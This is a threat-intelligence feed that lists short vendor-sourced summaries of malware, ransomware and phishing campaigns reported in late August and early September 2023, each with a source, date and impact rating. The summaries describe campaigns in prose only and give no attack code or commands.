—
- Intel Source:
- Security Joes
- Intel Name:
- Hackers_Exploiting_MinIO_Storage_System
- Date of Scan:
- 2023-09-05
- Impact:
- LOW
- Summary:
- Infected Microsoft SQL Server (MSSQL) databases were being used to deliver Cobalt Strike and ransomware payloads, according to Securonix Threat Lab research. Using MSSQL as a beachhead, the attackers deploy a variety of payloads, including remote-access Trojans (RATs) and a fresh Mimic ransomware variant named FreeWorld, after first infiltrating the target machine.
—
- Intel Name:
- Cyberattack_by_APT28_Using_msedge_as_a_Bootloader
- Date of Scan:
- 2023-09-05
- Impact:
- LOW
- Summary:
- Researchers from CERT-UA have observed a deliberate cyber attack against a crucial Ukrainian energy infrastructure site. An email message with a phony sender address and a link to an archive, like “photo.zip,” is being distributed to carry out the malicious scheme.
—
- Intel Source:
- Okta
- Intel Name:
- Okta_Warns_of_Social_Engineering_Attacks
- Date of Scan:
- 2023-09-04
- Impact:
- LOW
- Summary:
- Recent weeks have seen an increase in social engineering attacks against IT service desk staff, according to several U.S.-based Okta customers. The caller’s tactic was to persuade the service desk staff to reset all multi-factor authentication (MFA) factors enrolled by highly privileged users.
Source:
https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
—
- Intel Source:
- ASEC
- Intel Name:
- Following_the_Spread_of_Fileless_Malware_Through_Spam_Emails
- Date of Scan:
- 2023-09-04
- Impact:
- LOW
- Summary:
- A phishing campaign that spreads via spam emails and runs a PE file (EXE) without placing the file on the user’s computer has been uncovered by ASEC researchers. The malware strains AgentTesla, Remcos, and LimeRAT are finally executed by the malware attachment in the hta extension.
—
- Intel Source:
- Seqrite
- Intel Name:
- ZeroDay_Vulnerabilities_Detected_on_WinRAR
- Date of Scan:
- 2023-09-04
- Impact:
- MEDIUM
- Summary:
- In the widely used WinRAR software, the zero-day vulnerabilities CVE-2023-38831 and CVE-2023-40477 have been discovered. The possibility of remote code execution presented by these vulnerabilities raises serious security concerns. With half a billion users globally, it is a well-liked compression tool that is essential to numerous digital processes.
Source:
https://www.seqrite.com/blog/threat-advisory-zero-day-vulnerabilities-detected-on-winrar/
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- FreeWorld_Ransomware_Attacks_on_MSSQL_Databases
- Date of Scan:
- 2023-09-04
- Impact:
- MEDIUM
- Summary:
- Infected Microsoft SQL Server (MSSQL) databases were being used to deliver Cobalt Strike and ransomware payloads, according to Securonix Threat Lab research. Using MSSQL as a beachhead, the attackers deploy a variety of payloads, including remote-access Trojans (RATs) and a fresh Mimic ransomware variant named FreeWorld, after first infiltrating the target machine.
—
- Intel Source:
- Interlab
- Intel Name:
- A_new_campaign_of_novel_RAT
- Date of Scan:
- 2023-09-02
- Impact:
- LOW
- Summary:
- On 8/28/2023, Interlab got some a sample which was sent to a journalist with highly targeted content luring the recipient to open the document. After checking it, Interlab discovered that after initial compromise, the execution of an AutoIT script that was used to perform process injection using a process hollowing technique. The injected process contained a novel RAT, which was named “SuperBear” due to naming conventions in the code.
—
- Intel Source:
- Talos
- Intel Name:
- Analyses_on_new_open_source_infostealer
- Date of Scan:
- 2023-09-02
- Impact:
- LOW
- Summary:
- This week’s edition of the Threat Source newsletter. Talos is seeing more and more bad guys take advantage of the availability of tools that have been added to public malware sites, such as the infostealer “SaphireStealer” which was analyzed by Talos reserachers and shared in their blog.
Source:
https://blog.talosintelligence.com/new-open-source-infostealer-and-reflections-on-2023-so-far/
—
- Intel Source:
- Rapid7
- Intel Name:
- New_IDAT_Loader_executes_StealC_and_Lumma_Infostealers
- Date of Scan:
- 2023-09-02
- Impact:
- LOW
- Summary:
- Recently, Rapid7 discoverd the Fake Browser Update tricking users into executing malicious binaries. While analyzing the dropped binaries, Rapid7 determined a new loader is utilized in order to execute infostealers on compromised systems including StealC and Lumma.
—
- Intel Source:
- Talos
- Intel Name:
- An_Open_Source_Info_Stealer_Named_SapphireStealer
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- In December 2022, SapphireStealer was first published by the open-source community as an information stealing malware. Since then, it’s been observed across a number of public malware repositories with increasing frequency. The researchers have moderate confidence that multiple entities are using SapphireStealer. They have separately improved and modified the original code base, extending it to support additional data exfiltration mechanisms.
Source:
https://blog.talosintelligence.com/sapphirestealer-goes-open-source/
—
- Intel Source:
- Resecurity
- Intel Name:
- The_attacks_on_USPS_and_US_Citizens_for_data_theft
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- Resecurity has discovered a big-scale smishing campaign targeting the US Citizens. Similar scams have been noticed before targeting Fedex and UPS. The bad actors attributed to Chinese-speaking cybercriminals are leveraging a package tracking text scam sent via iMessage to collect personal (PII) and payment information from the victims with the goal of identity theft and credit card fraud. The cybercriminal group with associated campaign has been named “Smishing Triad” as it leverages smishing as the main attack vector and originates from China.
Source:
https://www.resecurity.com/blog/article/smishing-triad-targeted-usps-and-us-citizens-for-data-theft
—
- Intel Source:
- Trustwave
- Intel Name:
- Malicious_PDFs
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- Last couple months, Trustwave SpiderLabs analysts have noticed a spikein threat actors employing PDF documents to gain initial access through email-borne attacks. Though the use of PDF files as a malicious vector is not a novel approach, it has become more popular as threat actors continue to experiment with techniques to bypass conventional security controls.
—
- Intel Source:
- Cybergeeks
- Intel Name:
- A_detailed_analyses_of_Brute_Ratel_C4_payloads
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- Cyber Geeks did deep analyses of Brute Ratel C4 payloads. Brute Ratel C4 is a Red Team & Adversary simulation software that can be considered an alternative to Cobalt Strike.
Source:
https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Decrypting_Key_Group_Ransomware
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- EclecticIQ analysts discovered that Key Group ransomware can be classified as a low-sophisticated threat actor. The ransomware samples contained multiple cryptographic mistakes that enabled EclecticIQ to create a decryption tool for this specific ransomware version built in August 03,2023. Key Group or KEYGROUP777, is a Russian-speaking cybercrime actor focusing on financial gain by selling Personal Identifying Information (PII) or initial access to compromised devices and obtaining ransom money.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Exploitation_of_CVE_2023_38831
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- The Ukrainian CERT-UA government computer emergency response team has noted a cyberattack by the UAC-0057 group. It was discovered that the “Zbirnyk_tez_Y_23.rar” file contained an exploit for the CVE-2023-38831 vulnerability. If this exploit is successful, it will cause the BAT file “16872_16_2023_03049.pdf.cmd” to be launched, which will cause the LNK file “16872_16_2023_03049.lnk” to launch, which will then use the mshta.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Taking_down_the_main_admin_of_phishing_as_a_service_16shop
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- TrendMicro did analyses and investigations on phishing-as-a-service 16shop through the years. Plus was mentioned about he partnership between Trend Micro and Interpol in taking down the main administrators and servers of this massive phishing campaign.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Custom_Executable_Formats_From_Hidden_Bee_to_Rhadamanthys
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- The design and implementation of Hidden Bee coin miner and Rhadamanthys stealer considerably overlap. Custom executable formats, the usage of comparable virtual filesystems, the use of LUA scripts, identical routes to some of the components, reused functions, similar use of steganography, and overall related architecture are just a few examples of the similarities that are readily obvious.
—
- Intel Source:
- Sentilone
- Intel Name:
- A_new_wave_of_Good_Day_ransomware_attacks
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- Sentilone reserachers shared in their blog several unique Good Day ransom notes and victim portals and shared their analysis of a sample associated with a URL leading to a known Cloak extortion site. Good Day ransomware, a variant within the ARCrypter family. This new wave of Good Day attacks feature individual TOR-based victim portals for each target.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_attacks_on_Adobe_ColdFusion
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- Last month, Adobe took some counter measurementsto the exploitation of targeting pre-authentication remote code execution (RCE) vulnerabilities in their ColdFusion solution. FortiGuard Labs IPS telemetry data again detected numerous efforts to exploit the Adobe ColdFusion deserialization of untrusted data vulnerability, which creates a huge risk of arbitrary code execution. These attacks include probing, establishing reverse shells, and deploying malware for subsequent actions. Fortinet nalysts shared their detailed analysis of how this threat group exploits the Adobe ColdFusion vulnerability.
—
- Intel Source:
- Rapid7
- Intel Name:
- The_increased_threat_activity_against_Cisco_ASA_SSL_VPN_appliances
- Date of Scan:
- 2023-08-31
- Impact:
- MEDIUM
- Summary:
- Rapid7’s managed detection and response team have discovered increased threat activity targeting Cisco ASA SSL VPN appliances (physical and virtual). In some cases, adversaries have created credential stuffing attacks that leveraged weak or default passwords; in others, the activity was observed appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or was not enforced for all users (i.e., via MFA bypass groups).
—
- Intel Source:
- Walmart Global Tech Blog
- Intel Name:
- DGA_analysis_and_the_Gazavat_DMSniff_link
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- Gazavat, a multi-functional backdoor that shares code with the POS malware DMSniff, is also known as Expiro, at least in part. It has been grouped alongside a few other malware versions throughout the years under the name Expiro, a file infector, by AV companies. This is a result of various malware families using the Carberp malware leak’s leaked code.
Source:
https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d
—
- Intel Source:
- ASEC
- Intel Name:
- Examining_Andariel_Recent_Attacking_Activities
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- Attacks thought to have been carried out by the Andariel group have been found by ASEC researchers. It is known that the Lazarus threat group or one of its affiliates is associated with the Andariel threat group, which typically targets Korean businesses and organizations. Since 2008, attacks on targets in Korea have been noted.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Estries_Targeting_Government_and_Technology_Sector
- Date of Scan:
- 2023-08-30
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMicro have uncovered a fresh cyberespionage operation by the Earth Estries hacker collective. As Earth Estries targets governments and enterprises in the technology sector, they found parallels with the advanced persistent threat (APT) group FamousSparrow after analyzing the deployed tactics, methods, and procedures (TTPs).
—
- Intel Source:
- McAfee
- Intel Name:
- RemcosRat_Malware_Peeled_Back
- Date of Scan:
- 2023-08-30
- Impact:
- LOW
- Summary:
- Researchers from McAfee have discovered a Remcos RAT operation that uses phishing emails to distribute malicious VBS scripts. A ZIP/RAR attachment was included in a phishing email. There is a highly obscured VBS file inside of this ZIP.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/peeling-back-the-layers-of-remcosrat-malware/
—
- Intel Source:
- Trustwave
- Intel Name:
- The_Rise_of_QR_Codes_in_Phishing
- Date of Scan:
- 2023-08-30
- Impact:
- LOW
- Summary:
- Threat actors are taking image phishing to the advance level by taking advantage of QR codes, a.k.a. ‘Qishing’, to hide their malicious URLs. The samples Tustwave analysts observed have been useing the technique are primarily disguised as Multifactor Authentication (MFA) notifications, which tricks their victims into scanning the QR code with their mobile phones to gain access. However, instead of going to the target’s desired location, the QR code leads them to the threat actor’s phishing page.
—
- Intel Source:
- Secureworks
- Intel Name:
- The_actions_against_the_Qakbot_botnet
- Date of Scan:
- 2023-08-30
- Impact:
- MEDIUM
- Summary:
- On August 29, 2023, U.S. law enforcement started a national operation for a that disruptionof the Qakbot botnet (also known as Qbot) and associated infrastructure. Secureworks Counter Threat Unit researchers have observed and monitored for a long time this botnet and detected the disruption activity on August 25. The initial access vector for these intrusions was a phishing email. Qakbot was one of the top malware threats, used by cybercriminals to deliver other malware such as Conti, ProLock, Egregor, REvil, MegaCortex, and Black Basta. The botnet was lucrative for the GOLD LAGOON threat group, which has operated the Qakbot malware since 2007. The threat actors reportedly received approximately $58 million in ransom payments between October 2021 and April 2023.
Source:
https://www.secureworks.com/blog/qakbot-campaign-delivered-black-basta-ransomware
—
- Intel Source:
- Aquasec
- Intel Name:
- The_exploition_of_Kinsing_Malware
- Date of Scan:
- 2023-08-30
- Impact:
- LOW
- Summary:
- Aqua Nautilus observed a new malware campaign that exploits the Openfire vulnerability (CVE-2023-32315) which deploys Kinsing malware and a cryptominer. This vulnerability leads to a path traversal attack, which grants an unauthenticated user access to the Openfire setup environment. This then allows the threat actor to create a new admin user and upload malicious plugins. Eventually the attacker can gain full control over the server.
Source:
https://blog.aquasec.com/kinsing-malware-exploits-novel-openfire-vulnerability
—
- Intel Source:
- Security Affairs
- Intel Name:
- Target_on_Citrix_NetScaler_systems_in_massive_attacks
- Date of Scan:
- 2023-08-29
- Impact:
- MEDIUM
- Summary:
- Sophos X-Ops has tracked an ongoing campaign, which is targeting Citrix NetScaler systems, conducted by threat actors linked to the FIN8 group. The hackers are exploiting the remote code execution, tracked as CVE-2023-3519, in a large-scale campaign. The flaw CVE-2023-3519 (CVSS score: 9.8) is a code injection that could result in unauthenticated remote code execution.
Source:
https://securityaffairs.com/150028/hacking/fin8-citrix-netscaler.html?amp=1
—
- Intel Source:
- Sophos
- Intel Name:
- Hackers_Targeting_Unpatched_Citrix_and_NetScaler_Systems
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
-
A campaign by threat actors to target unpatched Citrix and NetScaler systems that are online is being monitored by Sophos X-Ops at the moment. The data shows a considerable similarity between CVE-2023-3519-based attacks that deliver malware and webshells and earlier attempts that used a lot of the same TTPs.
IOC link: https://github.com/sophoslabs/IoCs/blob/master/2023-08-25%20Citrix%20CVE-2023-3519%20attacks.csv
Source:
https://infosec.exchange/@SophosXOps/110951651051968204
—
- Intel Source:
- Phylum
- Intel Name:
- NPM_Package_Masquerading
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
- On August 24th 2023,, Phylum’s detection system observed a suspicious package published to npm called “emails-helper.” After investigating it, it was determined that this package was part of an sophisticated attack involving Base64-encoded and encrypted binaries. The scheme delivers encryption keys from a DNS TXT record hosted on a remote server. Additionally, a hex-encoded URL is retrieved from this remote server and then passed to the spawned binaries. The outcome of it is the deployment of powerful penetration testing tools such as dnscat2, mettle, and Cobalt Strike Beacon.
Source:
https://blog.phylum.io/npm-emails-validator-package-malware/
—
- Intel Source:
- JPCERT
- Intel Name:
- Embedding_a_malicious_Word_file_into_a_PDF_file
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
- JPCERT/CC has discovered a new technique was used in a July attack, which bypassed detection by embedding a malicious Word file into a PDF file. They described in their blog the technique “MalDoc in PDF” and explained the details of and countermeasures against it.
Source:
https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html
—
- Intel Source:
- Telekom Security
- Intel Name:
- DarkGate_Malware_Activity_Spikes
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
- Telekom security researchers have identified that a new malspam campaign was observed deploying an off-the-shelf malware called DarkGate. The current spike in DarkGate malware activity is plausible given the fact that the developer of the malware has recently started to rent out the malware to a limited number of affiliates.
Source:
https://github.security.telekom.com/2023/08/darkgate-loader.html
—
- Intel Source:
- Ironnet
- Intel Name:
- An_increase_in_MacOS_malware_detections
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- IronNet has observed an increase in MacOS malware within IronDome’s Education sector over the past couple of weeks. Their analysts investigated into these incidents found these infections were originating from already-infected personal devices that were brought into education networks, with the majority of these occurring at higher education institutions.
Source:
https://www.ironnet.com/blog/back-to-school-reminder-keep-your-macs-clean
—
- Intel Source:
- CERT-UA
- Intel Name:
- Emails_Containing_BAT_Files_in_BZIP_GZIP_and_RAR_Archives
- Date of Scan:
- 2023-08-28
- Impact:
- MEDIUM
- Summary:
- The distribution of emails with attachments in the form of BZIP, GZIP, and RAR archives containing BAT files made with the aid of the ScrubCrypt cryptor (price – from USD 249), the launch of which will guarantee that the computer is affected by the malicious program AsyncRAT, has been observed by CERT-UA researchers.
—
- Intel Source:
- Netenrich
- Intel Name:
- In_Depth_Analysis_of_ADHUBLLKA_Ransomware_Family
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- Researchers at Netenrich examined the Adhubllka ransomware, which is targeting regular people and small businesses with ransoms ranging from $800 to $1,600 since at least January 2020.
Source:
https://netenrich.com/blog/discovering-the-adhubllka-ransomware-family
—
- Intel Source:
- Juniper
- Intel Name:
- DreamBus_Botnet_comes_back
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- Juniper Threat Labs reserachers has observed multiple attacks where threat actors used a vulnerability affecting RocketMQ servers (CVE-2023-33246) to infiltrate systems and install the malicious DreamBus bot, a malware strain last seen in 2021. This vulnerability opened the door for hackers to exploit the RocketMQ platform, leading to a series of attacks. Juniper analysts shared the details in their blog of the attacks and the bot.
—
- Intel Source:
- Akamai
- Intel Name:
- IoT_Targeting_Malware_Expands_Threat_Landscape
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- The Akamai Security Intelligence Response Team (SIRT) has identified a concerning evolution in the KmsdBot malware campaign. The newly discovered Kmsdx binary marks a significant update, now focusing on targeting Internet of Things (IoT) devices. This version of the malware incorporates telnet scanning capabilities and supports a wider range of CPU architectures, expanding its attack potential. The update underscores the ongoing threat posed by vulnerable IoT devices and reinforces the critical need for continuous security measures and updates. KmsdBot’s scope encompasses private gaming servers, cloud hosting providers, and specific government and educational sites, suggesting a persistent concern for IoT security in a rapidly evolving threat landscape.
Source:
https://www.akamai.com/blog/security-research/updated-kmsdbot-binary-targeting-iot
—
- Intel Source:
- DFIR Report
- Intel Name:
- Widespread_Ransomware_is_Caused_by_HTML_Smuggling
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- Researchers from the DFIR report have noted that the threat actor behind the Nokoyawa Ransomware only deployed the final ransomware 12 hours after the initial intrusion. In November 2022, this threat actor used HTML smuggling to send businesses a password-protected ZIP file. An ISO file that distributed IcedID, which then used Cobalt Strike and finally Nokoyawa ransomware, was contained in the password-protected ZIP file.
Source:
https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/
—
- Intel Source:
- ASEC
- Intel Name:
- Case_Studies_of_MS_SQL_Server_Proxyjacking
- Date of Scan:
- 2023-08-28
- Impact:
- MEDIUM
- Summary:
- Poorly managed MS-SQL servers have been the subject of proxyjacking attacks, according to ASEC experts. One of the primary attack methods for Windows systems is to employ publicly accessible MS-SQL servers with easy-to-guess passwords. Threat actors frequently attempt to obtain access to poorly maintained MS-SQL servers via brute force or dictionary assaults. If successful, they infect the system with malware.
—
- Intel Source:
- Trellix
- Intel Name:
- Recent_activity_of_Scattered_Spider_threat_group
- Date of Scan:
- 2023-08-26
- Impact:
- MEDIUM
- Summary:
- Trellix researchers in their blog describe the details of the modus operandi of Scattered Spider; their recent events and tools leveraged by tthem, vulnerabilities exploited, and their impact. It also indicates that this group has started targeting other sectors, including critical infrastructure organizations. Scattered Spider is known for theft of sensitive data and leveraging trusted organizational infrastructure for follow-on attacks on downstream customers.
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_Constant_Threat_Posed_by_Remcos_RAT
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- Researchers from Cyfirma have examined an ongoing operation run by the Remcos Remote Access Trojan (RAT). The analysis reveals a highly developed threat ecosystem that makes use of a number of strategies, including malicious IP addresses, covert payloads, and complex functions that infect systems and acquire sensitive data.
Source:
https://www.cyfirma.com/outofband/the-persistent-danger-of-remcos-rat/
—
- Intel Source:
- Microsoft
- Intel Name:
- A_Chinese_threat_actor_group_Flax_Typhoon_access_Taiwanese_organizations
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- Microsoft has detected a pattern of malicious activity affecting organizations in Taiwan using techniques that could be easily reused in other operations everywhere else. Microsoft assignes this campaign to Flax Typhoon (overlaps with ETHEREAL PANDA), a nation-state actor based out of China. Flax Typhoon’s observed behavior tells the threat actor intends to perform espionage and maintain access to organizations across a broad range of industries for as long as possible.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- The_Investigation_of_RedLine_Stealer_Spam_Campaign
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- EclecticIQ researchers have gathered samples from a RedLine stealer spam campaign that ran between April and August 2023. The campaign was successful by distributing command and control among recently created domains hosted on IP addresses with reliable traffic, and Redline developers provide minor iterations to previous variants.
Source:
https://blog.eclecticiq.com/redline-stealer-variants-demonstrate-a-low-barrier-to-entry-threat
—
- Intel Source:
- Talos
- Intel Name:
- Lazarus_Group_Exploits_ManageEngine_Flaw_to_Launch_QuiteRAT
- Date of Scan:
- 2023-08-25
- Impact:
- HIGH
- Summary:
- Researchers from Cisco Talos have identified the Lazarus Group as a state-sponsored actor operating against European and American healthcare organizations and internet backbone infrastructure. This is the third known effort that this actor is responsible for in less than a year, and they have all utilized the same infrastructure.
Source:
https://blog.talosintelligence.com/lazarus-quiterat/
—
- Intel Source:
- Secureworks
- Intel Name:
- Smoke_Loader_Dropping_Geolocation_Malware_And_Flimsy_Recon_WiFi_Scanning_Software
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- Researchers from Secureworks have seen the Smoke Loader botnet deliver a specific Wi-Fi scanning program to compromised systems. This trojan was given the name Whiffy Recon. With the help of adjacent Wi-Fi access points as a source of information, it triangulates the coordinates of the infected PCs using Google’s geolocation API.
—
- Intel Source:
- Talos
- Intel Name:
- Lazarus_Group_new_threat_CollectionRAT
- Date of Scan:
- 2023-08-25
- Impact:
- HIGH
- Summary:
- Researchers from Cisco Talos have discovered another Lazarus Group’s new threat called “CollectionRAT”. CollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary commands on an infected system. Cisco Talos analysts made analysis on it and came to the conclusion that CollectionRAT appears to be connected to Jupiter/EarlyRAT, another malware family Kaspersky recently wrote about and attributed to Andariel, a subgroup within the Lazarus Group umbrella of threat actors.
Source:
https://blog.talosintelligence.com/lazarus-collectionrat/
—
- Intel Source:
- Zscaler
- Intel Name:
- New_Info_Stealer_Family_Named_Agniane
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- Agniane Stealer is a novel information stealer family discovered by Zscaler researchers. This malware takes credentials, system data, and session information from browsers, tokens, and file transfer tools. When Agniane Stealer acquires sensitive data, it passes it to command-and-control servers, where threat actors can act on the stolen information.
Source:
https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-webs-crypto-threat
—
- Intel Source:
- Sentinelone
- Intel Name:
- Evolution_of_Ransomware_Linux_and_ESXi_Focused_Threats
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- SentinelOne researchers have observed that Ransomware tactics have evolved, with attackers now targeting Linux and VMWare ESXi platforms alongside Windows. This article explores recent ransomware families like MONTI Locker, Akira Ransomware, Trigona Linux Locker, and Abyss Locker. These threats exhibit cross-platform capabilities and strategic code reuse.
—
- Intel Source:
- SOC Radar
- Intel Name:
- Raccoon_Stealer_Returns_with_New_Version
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- SOC Radar researchers have discovered that the creators of the data-stealing malware Raccoon Stealer have ended their six-month online silence. They are currently encouraging potential hackers to use the updated 2.3.0 malware (2.3.0.1 since August 15, 2023) version.
Source:
https://socradar.io/raccoon-stealer-resurfaces-with-new-enhancements/
—
- Intel Source:
- Any.Run
- Intel Name:
- Technical_Analysis_of_XWorm_Malware
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- AnyRun researchers have seen the latest version of an XWorm sample — a widespread malicious program that is advertised for sale on underground forums.
Source:
https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/
—
- Intel Source:
- Safebreach
- Intel Name:
- New_Threat_Coverage_Akira_8Base_and_Rorschach
- Date of Scan:
- 2023-08-24
- Impact:
- MEDIUM
- Summary:
- Safebreach researchers have observed that the Hacker’s Playbook Threat Coverage round-up unveils added coverage for recently identified ransomware and malware variants, including Akira ransomware, 8Base ransomware, Rorschach (BabLock) ransomware, and others. SafeBreach customers can now simulate and assess their defenses against these evolving threats using the SafeBreach Hacker’s Playbook™.
Source:
https://www.safebreach.com/resources/akira-ransomware-8base-threat-coverage/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Evolving_Malvertising_Tactics_advanced_Cloaking_Strategies
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- Malvertising campaigns are evolving with the adoption of advanced cloaking techniques that hinder detection and response. This article explores a recent malvertising chain that employs intricate fingerprinting, using encoded JavaScript, to assess visitor legitimacy. This escalating cyber battle underscores the challenges faced by defenders in countering these deceptive tactics
—
- Intel Source:
- Trendmicro
- Intel Name:
- AI_Hype_Abused_in_Malicious_Facebook_Ads
- Date of Scan:
- 2023-08-23
- Impact:
- LOW
- Summary:
- Trendmicro researchers have identified Cybercriminals are capitalizing on the excitement surrounding Artificial Intelligence (AI) advancements through deceptive Facebook ads. These ads promise AI-powered advantages but instead distribute a malicious browser add-on that aims to steal victims’ credentials. By exploiting AI enthusiasm, attackers are using URL shorteners and cloud storage to spread their harmful payload.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Dropping_AgentTesla_Exotic_Excel_Files
- Date of Scan:
- 2023-08-23
- Impact:
- LOW
- Summary:
- SANS researchers discovered that attackers prefer to employ more unusual extensions to boost their chances of escaping simple and foolish mail gateway regulations. This time, the extension “.xlam” was used.It discovered multiple emails that sent.xlam files to potential victims.
Source:
https://isc.sans.edu/diary/More+Exotic+Excel+Files+Dropping+AgentTesla/30150/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Spacecolon_Deploy_Scarab_Ransomware_on_Vulnerable_Servers
- Date of Scan:
- 2023-08-23
- Impact:
- LOW
- Summary:
- ESET researchers examined the Spacecolon, a modest toolset used to distribute Scarab ransomware versions to victims all around the world. It is most likely introduced into victim organisations by its operators exploiting insecure web servers or brute-forcing RDP credentials.
Source:
https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/
—
- Intel Source:
- ASEC
- Intel Name:
- APT_Attack_Patterns_Targeting_Web_Services_of_Korean_Corporations
- Date of Scan:
- 2023-08-22
- Impact:
- MEDIUM
- Summary:
- ASEC reserachers has discovered the APT attacks on Korean corporate web servers. The attackers exploit vulnerabilities to infiltrate and execute malicious actions. The report covers attack techniques such as privilege escalation, credential theft, and remote control using tools like Mimikatz, Potato, and NetCat. The attackers’ objectives appear to evolve from ad insertion to potentially deploying ransomware.
—
- Intel Source:
- Cyfirma
- Intel Name:
- CraxsRAT_and_CypherRAT_Created_by_EVLF_DEV
- Date of Scan:
- 2023-08-22
- Impact:
- LOW
- Summary:
- The CYFIRMA research team has identified a new Malware-as-a-Service (MaaS) operator known as EVLF DEV. This threat actor is responsible for the development of CypherRAT and CraxsRAT, which have been purchased on a lifetime licence by over 100 different threat actors in the previous three years.
Source:
https://www.cyfirma.com/outofband/unmasking-evlf-dev-the-creator-of-cypherrat-and-craxsrat/
—
- Intel Source:
- Symantec
- Intel Name:
- Chinese_APT_Targeting_Hong_Kong_in_Supply_Chain_Attack
- Date of Scan:
- 2023-08-22
- Impact:
- LOW
- Summary:
- Symantec researchers have identified that an emerging China-backed advanced persistent threat group targeted organizations in Hong Kong in a supply chain attack that leveraged legitimate software to deploy the PlugX/Korplug backdoor.
—
- Intel Source:
- Sentinelone
- Intel Name:
- New_Variant_of_XLoader_macOS_Malware
- Date of Scan:
- 2023-08-22
- Impact:
- LOW
- Summary:
- SentinelOne researchers have observed that a new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called OfficeNote.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_WoofLocker_Tech_Support_Campaign_is_Back
- Date of Scan:
- 2023-08-21
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have discovered that the WoofLocker tech support scam scheme has returned. The tactics and procedures are fairly similar, but the infrastructure has been strengthened to withstand future takedown attempts.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/08/wooflocker2
—
- Intel Source:
- ISC.SANS
- Intel Name:
- System_BCMalware_Activity
- Date of Scan:
- 2023-08-21
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed the captured request: /systembc/password.php. According to some references, this is likely the SystemBC Remote Access Trojan (RAT), all 4 IPs are part of the Digital Ocean ASN and only one has been reported as likely malicious.
Source:
https://isc.sans.edu/diary/SystemBC+Malware+Activity/30138/
—
- Intel Source:
- QuickHeal
- Intel Name:
- Diving_Deep_into_Darkrace_Ransomware
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
- The incorporation of Lockbit’s strategies into DarkRace demonstrates how cybercriminals are utilizing tried-and-true techniques to strengthen their attacks and increase damage. Combining these strategies could increase infections, compromise data, and escalate ransom demands.
Source:
https://blogs.quickheal.com/darkrace-ransomware-a-deep-dive-into-its-techniques-and-impact/
—
- Intel Source:
- QuickHeal
- Intel Name:
- Mallox_Ransomware_Targeting_Unprotected_Microsoft_SQL_Servers
- Date of Scan:
- 2023-08-18
- Impact:
- MEDIUM
- Summary:
- Researchers from QuickHeal have discovered that the Mallox (also known as TargetCompany) ransomware is presently using unprotected Microsoft SQL Servers as an attack vector to enter victims’ systems and spread itself.
Source:
https://blogs.quickheal.com/mallox-ransomware-strikes-unsecured-mssql-servers/
—
- Intel Source:
- Fortinet
- Intel Name:
- NoCry_and_Trash_Panda_Ransomware
- Date of Scan:
- 2023-08-18
- Impact:
- LOW
- Summary:
